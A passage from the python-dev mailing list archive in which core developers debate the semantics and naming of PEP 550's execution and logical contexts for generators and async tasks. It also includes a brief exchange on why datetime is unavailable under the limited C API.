> * ContextKey.set() can only modify the *top* LC in the stack. > > If LC is a mutable mapping: > > # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] > > a.set(c) > # LC4 = EC.top() > # LC4[a] = c > > # EC = [LC1, LC2, LC3, LC4({a: c, foo: bar})] > > If LC are implemented with immutable mappings: > > # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] > > a.set(c) > # LC4 = EC.pop() > # LC4_1 = LC4.copy() > # LC4_1[a] = c > # EC.push(LC4_1) > > # EC = [LC1, LC2, LC3, LC4_1({a: c, foo: bar})] > > Any code that uses EC will not see any difference, because it can only > work with the top LC. > OK, good. This makes more sense, especially if I read "the EC" as shorthand for the EC stored in the current thread's per-thread state. The immutable mapping (if used) is used for the LC, not for the EC, and in this case cloning an EC would simply make a shallow copy of its underlying list -- whereas without the immutable mapping, cloning the EC would also require making shallow copies of each LC. And I guess the linked-list implementation (Approach #3 in the PEP) makes EC cloning an O(1) operation. Note that there is a lot of hand-waving and shorthand in this explanation, but I think I finally follow the design. It is going to be a big task to write this up in a didactic way -- the current PEP needs a fair amount of help in that sense. (If you want to become a better writer, I've recently enjoyed reading Steven Pinker's *The Sense of Style*: The Thinking Person's Guide to Writing in the 21st Century. Amongst other fascinating topics, it explains why so often what we think is clearly written can cause so much confusion.) > Back to generators. Generators have their own empty LCs when created > to store their *local* EC modifications. > > When a generator is *being* iterated, it pushes its LC to the EC. When > the iteration step is finished, it pops its LC from the EC. If you > have nested generators, they will dynamically build a stack of their > LCs while they are iterated. > > Therefore, generators *naturally* control the stack of EC. We can't > execute two generators simultaneously in one thread (we can only > iterate them one by one), so the top LC always belongs to the current > generator that is being iterated: > > def nested_gen(): > # EC = [outer_LC, gen1_LC, nested_gen_LC] > yield > # EC = [outer_LC, gen1_LC, nested_gen_LC] > yield > > def gen1(): > # EC = [outer_LC, gen1_LC] > n = nested_gen() > yield > # EC = [outer_LC, gen1_LC] > next(n) > # EC = [outer_LC, gen1_LC] > yield > next(n) > # EC = [outer_LC, gen1_LC] > > def gen2(): > # EC = [outer_LC, gen2_LC] > yield > # EC = [outer_LC, gen2_LC] > yield > > g1 = gen1() > g2 = gen2() > > next(g1) > next(g2) > next(g1) > next(g2) > This, combined with your later clarification: > In the current version of the PEP, generators are initialized with an > empty LogicalContext. When they are being iterated (started or > resumed), their LogicalContext is pushed to the EC. When the > iteration is stopped (or paused), they pop their LC from the EC. makes it clear how the proposal works for generators. There's an important piece that I hadn't figured out from Nick's generator example, because I had mistakenly assumed that something *would* be captured at generator create time. It's a reasonable mistake to make, I think -- the design space here is just huge and there are many variations that don't affect typical code but do differ in edge cases. Your clear statement "nothing needs to be captured" is helpful to avoid this misunderstanding. 
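A runnable toy model of that push/pop behaviour, with plain dicts standing in for LCs and a helper standing in for the machinery the PEP attaches to send()/throw() (illustrative only, not the proposed implementation):

    ec = [{}]                          # the EC: a stack of dicts acting as LCs

    def ck_get(key, default=None):
        for lc in reversed(ec):        # innermost LC first
            if key in lc:
                return lc[key]
        return default

    def ck_set(key, value):
        ec[-1][key] = value            # writes go to the innermost LC only

    def run_step(gen, lc):
        ec.append(lc)                  # push the generator's LC...
        try:
            return next(gen)
        finally:
            ec.pop()                   # ...and pop it when the step finishes

    def g():
        ck_set("x", "inner")           # stays in the generator's LC
        yield ck_get("y")
        yield ck_get("y")              # re-resolved on every resumption

    gen, lc = g(), {}
    ck_set("y", "outer")
    assert run_step(gen, lc) == "outer"
    ck_set("y", "changed")                  # external change between iterations
    assert run_step(gen, lc) == "changed"   # ...makes its way in
    assert ck_get("x") is None              # the generator's write did not leak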
> HAMT is a way to efficiently implement immutable mappings with O(log32 > N) set operation, that's it. If we implement immutable mappings using > regular dicts and copy, set() would be O(log N). > This sounds like abuse of the O() notation. Mathematically O(log N) and O(log32 N) surely must be equivalent, since log32 N is just K*(log N) for some constant K (about 0.288539), and the constant disappears in the O(), as O(K*f(N)) and O(f(N)) are equivalent. Now, I'm happy to hear that a HAMT-based implementation is faster than a dict+copy-based implementation, but I don't think your use of O() makes sense here. > [..] > >> > >> I'll also note that the first iteration of the PEP didn't really make > >> this distinction, and it caused a problem that Nathaniel pointed out: > >> generators would "snapshot" their entire dynamic context when first > >> created, and then never adjust it for external changes between > >> iterations. This meant that if you adjusted something like the decimal > >> context outside the generator after creating it, it would ignore those > >> changes - instead of having the problem of changes inside the > >> generator leaking out, we instead had the problem of changes outside > >> the generator *not* making their way in, even if you wanted them to. > > > > > > OK, this really needs to be made very clear early in the PEP. Maybe this > > final sentence provides the key requirement: changes outside the > generator > > should make it into the generator when next() is invoked, unless the > > generator itself has made an override; but changes inside the generator > > should not leak out through next(). > > It's covered here with two examples: > https://www.python.org/dev/peps/pep-0550/#ec-semantics-for-generators > I think what's missing is the fact that this is one of the key motivating reasons for the design (starting with v2 of the PEP). When I encountered that section I just skimmed it, assuming it was mostly just showing how to apply the given semantics to generators. I also note some issues with the use of tense here -- it's a bit confusing to follow which parts of the text refer to defects of the current (pre-PEP) situation and which parts refer to how the proposal would solve these defects. -- --Guido van Rossum (python.org/~guido ) -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Mon Aug 21 20:31:37 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 20:31:37 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 8:06 PM, Guido van Rossum wrote: > On Mon, Aug 21, 2017 at 12:50 PM, Yury Selivanov > wrote: >> >> Few important things (using the current PEP 550 terminology): >> >> * ExecutionContext is a *dynamic* stack of LogicalContexts. >> * LCs do not reference other LCs. >> * ContextKey.set() can only modify the *top* LC in the stack. 
>> >> If LC is a mutable mapping: >> >> # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] >> >> a.set(c) >> # LC4 = EC.top() >> # LC4[a] = c >> >> # EC = [LC1, LC2, LC3, LC4({a: c, foo: bar})] >> >> If LC are implemented with immutable mappings: >> >> # EC = [LC1, LC2, LC3, LC4({a: b, foo: bar})] >> >> a.set(c) >> # LC4 = EC.pop() >> # LC4_1 = LC4.copy() >> # LC4_1[a] = c >> # EC.push(LC4_1) >> >> # EC = [LC1, LC2, LC3, LC4_1({a: c, foo: bar})] >> >> Any code that uses EC will not see any difference, because it can only >> work with the top LC. > > OK, good. This makes more sense, especially if I read "the EC" as shorthand > for the EC stored in the current thread's per-thread state. That's exactly what I meant by "the EC". > The immutable > mapping (if used) is used for the LC, not for the EC, and in this case > cloning an EC would simply make a shallow copy of its underlying list -- > whereas without the immutable mapping, cloning the EC would also require > making shallow copies of each LC. And I guess the linked-list implementation > (Approach #3 in the PEP) makes EC cloning an O(1) operation. All correct. > > Note that there is a lot of hand-waving and shorthand in this explanation, > but I think I finally follow the design. It is going to be a big task to > write this up in a didactic way -- the current PEP needs a fair amount of > help in that sense. Elvis Pranskevichus (our current What's New editor and my colleague) offered to help me with the PEP. He's now working on a partial rewrite. I've been working on this PEP for about a month now, and at this point I find it difficult to dump this knowledge in a nice and readable way (in any language that I know, FWIW). > (If you want to become a better writer, I've recently > enjoyed reading Steven Pinker's The Sense of Style: The Thinking Person's > Guide to Writing in the 21st Century. Amongst other fascinating topics, it > explains why so often what we think is clearly written can cause so much > confusion.) Will definitely check it out, thank you! > >> >> Back to generators. Generators have their own empty LCs when created >> to store their *local* EC modifications. >> >> When a generator is *being* iterated, it pushes its LC to the EC. When >> the iteration step is finished, it pops its LC from the EC. If you >> have nested generators, they will dynamically build a stack of their >> LCs while they are iterated. >> >> Therefore, generators *naturally* control the stack of EC. We can't >> execute two generators simultaneously in one thread (we can only >> iterate them one by one), so the top LC always belongs to the current >> generator that is being iterated: >> >> def nested_gen(): >> # EC = [outer_LC, gen1_LC, nested_gen_LC] >> yield >> # EC = [outer_LC, gen1_LC, nested_gen_LC] >> yield >> >> def gen1(): >> # EC = [outer_LC, gen1_LC] >> n = nested_gen() >> yield >> # EC = [outer_LC, gen1_LC] >> next(n) >> # EC = [outer_LC, gen1_LC] >> yield >> next(n) >> # EC = [outer_LC, gen1_LC] >> >> def gen2(): >> # EC = [outer_LC, gen2_LC] >> yield >> # EC = [outer_LC, gen2_LC] >> yield >> >> g1 = gen1() >> g2 = gen2() >> >> next(g1) >> next(g2) >> next(g1) >> next(g2) > > This, combined with your later clarification: > >> In the current version of the PEP, generators are initialized with an >> empty LogicalContext. When they are being iterated (started or >> resumed), their LogicalContext is pushed to the EC. When the >> iteration is stopped (or paused), they pop their LC from the EC.
> > makes it clear how the proposal works for generators. There's an important > piece that I hadn't figured out from Nick's generator example, because I had > mistakenly assumed that something *would* be captured at generator create > time. It's a reasonable mistake to make, Yeah, it is very subtle. > >> >> HAMT is a way to efficiently implement immutable mappings with O(log32 >> N) set operation, that's it. If we implement immutable mappings using >> regular dicts and copy, set() would be O(log N). > > > This sounds like abuse of the O() notation. Mathematically O(log N) and > O(log32 N) surely must be equivalent, since log32 N is just K*(log N) for > some constant K (about 0.288539), and the constant disappears in the O(), as > O(K*f(N)) and O(f(N)) are equivalent. Now, I'm happy to hear that a > HAMT-based implementation is faster than a dict+copy-based implementation, > but I don't think your use of O() makes sense here. I made a typo there: when implementing an immutable mapping with Python dicts, setting a key is an O(N) operation (not O(log N)): we need to make a shallow copy of a dict and then add an item to it. (the PEP doesn't have this typo) With HAMT, set() is O(log32 N): https://github.com/python/peps/blob/master/pep-0550-hamt_vs_dict.png Yury From yselivanov.ml at gmail.com Mon Aug 21 20:41:45 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 21 Aug 2017 20:41:45 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Mon, Aug 21, 2017 at 8:06 PM, Guido van Rossum wrote: [..] >> > OK, this really needs to be made very clear early in the PEP. Maybe this >> > final sentence provides the key requirement: changes outside the >> > generator >> > should make it into the generator when next() is invoked, unless the >> > generator itself has made an override; but changes inside the generator >> > should not leak out through next(). >> >> It's covered here with two examples: >> https://www.python.org/dev/peps/pep-0550/#ec-semantics-for-generators > > > I think what's missing is the fact that this is one of the key motivating > reasons for the design (starting with v2 of the PEP). When I encountered > that section I just skimmed it, assuming it was mostly just showing how to > apply the given semantics to generators. I also note some issues with the > use of tense here -- it's a bit confusing to follow which parts of the text > refer to defects of the current (pre-PEP) situation and which parts refer to > how the proposal would solve these defects. I see. The proposal always uses present tense to describe things it adds, and I now see that this is indeed very confusing. This needs to be fixed. Yury From greg.ewing at canterbury.ac.nz Mon Aug 21 19:39:31 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Tue, 22 Aug 2017 11:39:31 +1200 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: <599945C5.1030300@stoneleaf.us> References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <599945C5.1030300@stoneleaf.us> Message-ID: <599B6F33.9050803@canterbury.ac.nz> Ethan Furman wrote: > So I like ExecutionContext for the stack of > WhateverWeCallTheOtherContext contexts. But what do we call it? How about ExecutionContextFrame, by analogy with stack/stack frame. 
-- Greg From ncoghlan at gmail.com Tue Aug 22 01:09:05 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Tue, 22 Aug 2017 15:09:05 +1000 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: <599B6F33.9050803@canterbury.ac.nz> References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <599945C5.1030300@stoneleaf.us> <599B6F33.9050803@canterbury.ac.nz> Message-ID: On 22 August 2017 at 09:39, Greg Ewing wrote: > Ethan Furman wrote: >> >> So I like ExecutionContext for the stack of WhateverWeCallTheOtherContext >> contexts. But what do we call it? > > How about ExecutionContextFrame, by analogy with stack/stack frame. My latest suggestion to Yury was to see how the PEP reads with it called ImplicitContext, such that: * the active execution context is a stack of implicit contexts * ContextKey.set() updates the innermost implicit context * Contextkey.get() reads the whole stack of active implicit contexts * by default, generators (both sync and async) would have their own implicit context, but you could make them use the context of method callers by doing "gen.__implicit_context__ = None" * by default, coroutines would use their method caller's context, but async frameworks would make sure to give top-level tasks their own independent contexts That proposal came from an initial attempt at redrafting the Abstract and Rationale sections, where it turns out that one of the things the current version of the PEP is somewhat taking for granted is that the reader already has a particular understanding of the difference between explicit state management (i.e. passing things around as function arguments and instance attributes) and implicit state management (i.e. relying on process globals and thread locals). Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Tue Aug 22 01:17:15 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Tue, 22 Aug 2017 15:17:15 +1000 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <599B747F.1050208@canterbury.ac.nz> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On 22 August 2017 at 10:02, Greg Ewing wrote: > Yury Selivanov wrote: >> >> I can certainly see how "ContextFrame" can be correct if we think >> about "frame" as a generic term, but in Python, people will >> inadvertently think about a connection with frame objects/stacks. > > Calling it ExecutionContextFrame rather than just ContextFrame > would make it clear that it relates to ExecutionContexts in > particular. Please, no - it's already hard enough to help people internalise sync/async design concepts without also introducing ambiguity into the meaning of terms like locals & frame. Instead, let's leave those as purely referring to their existing always-synchronous concepts and find another suitable term for the dynamically nested read/write mappings making up the ExecutionContext :) Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From k7hoven at gmail.com Tue Aug 22 02:06:35 2017 From: k7hoven at gmail.com (Koos Zevenhoven) Date: Tue, 22 Aug 2017 09:06:35 +0300 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Tue, Aug 22, 2017 at 12:44 AM, Yury Selivanov wrote: > On Mon, Aug 21, 2017 at 5:39 PM, Koos Zevenhoven > wrote: > [..] > >> In the current version of the PEP, generators are initialized with an > >> empty LogicalContext. 
When they are being iterated (started or > >> resumed), their LogicalContext is pushed to the EC. When the > >> iteration is stopped (or paused), they pop their LC from the EC. > >> > > > > Another quick one before I go: Do we really need to push and pop a LC on > > each next() call, even if it most likely will never be touched? > > Yes, otherwise it will be hard to maintain the consistency of the stack. > > There will be an optimization: if the LC is empty, we will push NULL > to the stack, thus avoiding the cost of allocating an object. > > But if LCs are immutable, there needs to be only one empty-LC instance. That would avoid special-casing NULL in code. -- Koos > I measured the overhead -- generators will become 0.5-1% slower in microbenchmarks, but only when they do pretty much nothing. If a generator contains more Python code than a bare "yield" expression, the overhead will be harder to detect. -- + Koos Zevenhoven + http://twitter.com/k7hoven + -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Tue Aug 22 02:12:45 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 22 Aug 2017 02:12:45 -0400 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <20170820120711.3e876391@fsol> Message-ID: On Tue, Aug 22, 2017 at 2:06 AM, Koos Zevenhoven wrote: [..] >> There will be an optimization: if the LC is empty, we will push NULL >> to the stack, thus avoiding the cost of allocating an object. >> > But if LCs are immutable, there needs to be only one empty-LC instance. That > would avoid special-casing NULL in code. Yes, this is true. Yury From tismer at stackless.com Tue Aug 22 10:09:37 2017 From: tismer at stackless.com (stackless) Date: Tue, 22 Aug 2017 16:09:37 +0200 Subject: [Python-Dev] limited_api and datetime Message-ID: <3F679D4C-FD35-4774-B06E-B753E6CB243F@stackless.com> Hi again, I am trying to support the limited API (PEP 384) for PySide. Fortunately, everything worked out of the box, just the datetime module gives me a problem. Inspection showed that datetime is completely removed when the limitation is set. Can somebody enlighten me why that needs to be so? And how should I use datetime, instead: Fish the functions out of the dynamically imported datetime module? Thanks in advance - Chris Sent from my Ei4Steve From guido at python.org Tue Aug 22 11:22:27 2017 From: guido at python.org (Guido van Rossum) Date: Tue, 22 Aug 2017 08:22:27 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: As I understand the key APIs and constraints of the proposal better, I'm leaning towards FooContext (LC) and FooContextStack (EC), for some value of Foo that I haven't determined yet. Perhaps the latter can be shortened to just ContextStack (since the Foo part can probably be guessed from context. :-) -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed...
URL: From guido at python.org Tue Aug 22 11:34:55 2017 From: guido at python.org (Guido van Rossum) Date: Tue, 22 Aug 2017 08:34:55 -0700 Subject: [Python-Dev] PEP 550 v3 In-Reply-To: References: <20170819104018.4353509c@fsol> <59988A0C.30208@stoneleaf.us> <599945C5.1030300@stoneleaf.us> <599B6F33.9050803@canterbury.ac.nz> Message-ID: On Mon, Aug 21, 2017 at 10:09 PM, Nick Coghlan wrote: > My latest suggestion to Yury was to see how the PEP reads with it > called ImplicitContext, such that: > > * the active execution context is a stack of implicit contexts > * ContextKey.set() updates the innermost implicit context > * Contextkey.get() reads the whole stack of active implicit contexts > * by default, generators (both sync and async) would have their own > implicit context, but you could make them use the context of method > callers by doing "gen.__implicit_context__ = None" > * by default, coroutines would use their method caller's context, but > async frameworks would make sure to give top-level tasks their own > independent contexts > > That proposal came from an initial attempt at redrafting the Abstract > and Rationale sections, where it turns out that one of the things the > current version of the PEP is somewhat taking for granted is that the > reader already has a particular understanding of the difference > between explicit state management (i.e. passing things around as > function arguments and instance attributes) and implicit state > management (i.e. relying on process globals and thread locals). > I think I like ImplicitContext. Maybe we can go with this as a working title at least. I think we should also rethink the form the key framework-facing APIs will take, and how they are presented in the PEP -- I am now leaning towards explaining this from the start as an immutable linked list of immutable mappings, where the OS-thread state gets updated to a new linked list when it is changed (either by ContextKey.set or by the various stack manipulations). I think this falls under several Zen-of-Python points: EIBTI, and "If the implementation is easy to explain, it may be a good idea." -- --Guido van Rossum (python.org/~guido ) -------------- next part -------------- An HTML attachment was scrubbed... URL: From greg.ewing at canterbury.ac.nz Tue Aug 22 19:12:20 2017 From: greg.ewing at canterbury.ac.nz (Greg Ewing) Date: Wed, 23 Aug 2017 11:12:20 +1200 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: <599CBA54.5000106@canterbury.ac.nz> Guido van Rossum wrote: > Perhaps the latter can be > shortened to just ContextStack (since the Foo part can probably be > guessed from context. :-) -0.9, if I saw something called ContextStack turn up in a traceback I wouldn't necessarily jump to the conclusion that it was a stack of FooContexts rather than some other kind of context. EIBTI here, I think. 
-- Greg From python at mrabarnett.plus.com Tue Aug 22 19:46:30 2017 From: python at mrabarnett.plus.com (MRAB) Date: Wed, 23 Aug 2017 00:46:30 +0100 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <599CBA54.5000106@canterbury.ac.nz> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <599CBA54.5000106@canterbury.ac.nz> Message-ID: <3d91f79c-2e52-7689-66a3-fe89b1c20cbf@mrabarnett.plus.com> On 2017-08-23 00:12, Greg Ewing wrote: > Guido van Rossum wrote: >> Perhaps the latter can be >> shortened to just ContextStack (since the Foo part can probably be >> guessed from context. :-) > > -0.9, if I saw something called ContextStack turn up in a traceback > I wouldn't necessarily jump to the conclusion that it was a stack > of FooContexts rather than some other kind of context. EIBTI here, > I think. > The PEP says """This PEP proposes a new mechanism to manage execution state""", so ExecutionState or ExecState? From njs at pobox.com Tue Aug 22 22:12:16 2017 From: njs at pobox.com (Nathaniel Smith) Date: Tue, 22 Aug 2017 19:12:16 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On Tue, Aug 22, 2017 at 8:22 AM, Guido van Rossum wrote: > As I understand the key APIs and constraints of the proposal better, I'm > leaning towards FooContext (LC) and FooContextStack (EC), for some value of > Foo that I haven't determined yet. Perhaps the latter can be shortened to > just ContextStack (since the Foo part can probably be guessed from context. > :-) I guess I'll put in another vote for DynamicContext and DynamicContextStack. Though my earlier suggestion of these [1] sank like a stone, either because no-one saw it or because everyone hated it :-). We could do worse than just plain Context and ContextStack, for that matter. -n [1] https://mail.python.org/pipermail/python-ideas/2017-August/046840.html -- Nathaniel J. Smith -- https://vorpus.org From guido at python.org Tue Aug 22 23:51:02 2017 From: guido at python.org (Guido van Rossum) Date: Tue, 22 Aug 2017 20:51:02 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: > We could do worse than just plain Context and ContextStack, for that > matter. > I worry that that's going to lead more people astray thinking this has something to do with contextlib, which it really doesn't (it's much more closely related to threading.local()). Regarding DynamicAnything, I certainly saw it and didn't like it -- the only place where I've ever seen dynamic scoping was in Emacs Lisp, and I believe it was first shown to me as an anti-pattern thirty years ago. -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From njs at pobox.com Wed Aug 23 01:32:32 2017 From: njs at pobox.com (Nathaniel Smith) Date: Tue, 22 Aug 2017 22:32:32 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On Tue, Aug 22, 2017 at 8:51 PM, Guido van Rossum wrote: > On Tue, Aug 22, 2017 at 7:12 PM, Nathaniel Smith wrote: >> >> We could do worse than just plain Context and ContextStack, for that >> matter.
> > I worry that that's going to lead more people astray thinking this has > something to do with contextlib, which it really doesn't (it's much more > closely related to threading.local()). I guess that could be an argument for LocalContext and LocalContextStack, to go back full circle... -n -- Nathaniel J. Smith -- https://vorpus.org From ncoghlan at gmail.com Wed Aug 23 01:41:22 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 23 Aug 2017 15:41:22 +1000 Subject: [Python-Dev] limited_api and datetime In-Reply-To: <3F679D4C-FD35-4774-B06E-B753E6CB243F@stackless.com> References: <3F679D4C-FD35-4774-B06E-B753E6CB243F@stackless.com> Message-ID: On 23 August 2017 at 00:09, stackless wrote: > Hi again, > > I am trying to support the limited API (PEP 384) for PySide. Fortunately, > everything worked out of the box, just the datetime module gives me > a problem. Inspection showed that datetime is completely removed > when the limitation is set. > > Can somebody enlighten me why that needs to be so? The main problem is that "datetime.h" defines several C structs that we wouldn't want to add to the stable ABI, and nobody has previously worked through details of the interface to see which parts of it could still be used even if those structs were made opaque, and the macros relying on them were switched to being functions instead. There are almost certainly pieces of it that *could* be usefully exposed, though. > And how should I use datetime, instead: Fish the functions out of > the dynamically imported datetime module? Yep, going via the Python level API rather than directly to the C API is the default answer, as that inherently hides any struct layout details behind PyObject*. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Wed Aug 23 02:21:47 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 23 Aug 2017 16:21:47 +1000 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On 23 August 2017 at 13:51, Guido van Rossum wrote: > Regarding DynamicAnything, I certainly saw it and didn't like it -- the only > place where I've ever seen dynamic scoping was in Emacs Lisp, and I believe > it was first shown to me as an anti-pattern thirty years ago. As the original proponent of a Dynamic* naming scheme, I'll note that I eventually decided I didn't like it for the same reason I already didn't like naming schemes using either the word "local" or the word "frame": they all suggest a coupling to the synchronous call stack that deliberately isn't part of the proposal. That is (at least for me): - "local" suggests the implicit context will change when locals() changes - "frame" suggests the implicit context will change when the running frame changes - "dynamic" suggests dynamic scoping, which again suggests the implicit context will change on every function call None of those associations are true, since the essential point of the proposal is to *share* implicit state between frames of execution. The tricky part is defining exactly which frames should and shouldn't share their implicit context - threading.local() is our current best attempt, and the PEP is mainly driven by the problems introduced by relying solely on that in programs that implement concurrent execution of Python code independently of the underlying operating system threads.
My concern with "logical" context is different, which is that as a term it feels too *broad* to me: I'd expect the lexical context (nonlocals, module globals), the explicit context (function parameters), and the runtime context (process globals, threading.local()) to also be considered part of the overall logical context. It's also a very computer-sciencey term of art - if you ask an arbitrary English speaker "What does 'logical' mean?", they're very *un*likely to give you an answer that has anything to do with logical threads of control in computer programs. My latest suggestion (ImplicitContext) has some of the same issues as "logical context" (since the runtime context is also implicit), but seems more defensible on the grounds of it aiming to be a more robust way of accessing and manipulating implicit state in concurrent programs, rather than it being the only kind of implicit state that exists in an application. As an English word, the sense of "capable of being understood from something else though unexpressed" (the first definition that Merriam-Webster give) also has the benefit of describing *exactly* what the PEP is aiming to achieve. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From tismer at stackless.com Wed Aug 23 02:31:59 2017 From: tismer at stackless.com (Christian Tismer) Date: Wed, 23 Aug 2017 08:31:59 +0200 Subject: [Python-Dev] limited_api and datetime In-Reply-To: References: <3F679D4C-FD35-4774-B06E-B753E6CB243F@stackless.com> Message-ID: <5fa73959-6562-5ee2-d976-7574c31e3383@stackless.com> Hi Nick, On 23.08.17 07:41, Nick Coghlan wrote: > On 23 August 2017 at 00:09, stackless wrote: >> Hi again, >> >> I am trying to support the limited API (PEP 384) for PySide. Fortunately, >> everything worked out of the box, just the datetime module gives me >> a problem. Inspection showed that datetime is completely removed >> when the limitation is set. >> >> Can somebody enlighten me why that needs to be so? > > The main problem is that "datetime.h" defines several C structs that > we wouldn't want to add to the stable ABI, and nobody has previously > worked through details of the interface to see which parts of it could > still be used even if those structs were made opaque, and the macros > relying on them were switched to being functions instead. > > There are almost certainly pieces of it that *could* be usefully > exposed, though. > >> And how should I use datetime, instead: Fish the functions out of >> the dynamically imported datetime module? > > Yep, going via the Python level API rather than directly to the C API > is the default answer, as that inherently hides any struct layout > details behind PyObject*. Thank you very much for the clarification. I think we can live with the Python interface for now. Now I'm sure that's the way to go. Cheers -- Chris -- Christian Tismer :^) tismer at stackless.com Software Consulting : http://www.stackless.com/ Karl-Liebknecht-Str. 121 : https://github.com/PySide 14482 Potsdam : GPG key -> 0xFB7BEE0E phone +49 173 24 18 776 fax +49 (30) 700143-0023 -------------- next part -------------- A non-text attachment was scrubbed...
Name: signature.asc Type: application/pgp-signature Size: 496 bytes Desc: OpenPGP digital signature URL: From guido at python.org Wed Aug 23 11:46:13 2017 From: guido at python.org (Guido van Rossum) Date: Wed, 23 Aug 2017 08:46:13 -0700 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: On Tue, Aug 22, 2017 at 11:21 PM, Nick Coghlan wrote: > > As the original proponent of a Dynamic* naming scheme, I'll note that > I eventually decided I didn't like it for the same reason I already > didn't like naming schemes using either the word "local" or the word > "frame": they all suggest a coupling to the synchronous call stack > that deliberately isn't part of the proposal. > However, there is still *some* connection with the frame, though it's subtle. In particular the LC (using PEP v3 terms) for a generator is tied to that generator's frame (it becomes the top of the EC stack whenever that generator is resumed). I don't think we should call this out in the naming scheme though. -- --Guido van Rossum (python.org/~guido) -------------- next part -------------- An HTML attachment was scrubbed... URL: From solipsis at pitrou.net Wed Aug 23 11:58:42 2017 From: solipsis at pitrou.net (Antoine Pitrou) Date: Wed, 23 Aug 2017 17:58:42 +0200 Subject: [Python-Dev] PEP 550 v3 naming References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> Message-ID: <20170823175842.5a045798@fsol> For the record, I'm starting to think that "implicit context" is a reasonable name. (in case anyone is interested in those 2 cents of mine :-)) Regards Antoine. From yselivanov.ml at gmail.com Wed Aug 23 12:19:40 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Wed, 23 Aug 2017 12:19:40 -0400 Subject: [Python-Dev] PEP 550 v3 naming In-Reply-To: <20170823175842.5a045798@fsol> References: <20170821134348.155d17a1@fsol> <599B0C49.404@stoneleaf.us> <599B747F.1050208@canterbury.ac.nz> <20170823175842.5a045798@fsol> Message-ID: I think that "implicit context" is not an accurate description of what LogicalContext is. "implicit context" only makes sense when we talk about decimal context. For instance, in: Decimal(1) + Decimal(2) decimal context is implicit. But this is "implicit" from the standpoint of that code. Decimal will manage its context *explicitly*. Fixing decimal context is only one part of the PEP though. EC will also allow us to implement asynchronous task locals: current_request = new_context_key() async def handle_http_request(request): current_request.set(request) Here we explicitly set and will explicitly get values from the EC. We will explicitly manage the EC in asyncio.Task and when we schedule callbacks. Values stored in the EC are essentially globals (or TLS), which we don't call "implicit" in Python. PEP 550 refers to generators and asynchronous tasks as "logical threads", and "logical context" stems directly from that notion. "implicit" only covers one part of what LC really is. It implies that all EC/LC operations are implicit, which they are not. Logical Context is a neutral abstract term. Implicit Context bears a specific meaning that I don't think is accurate.
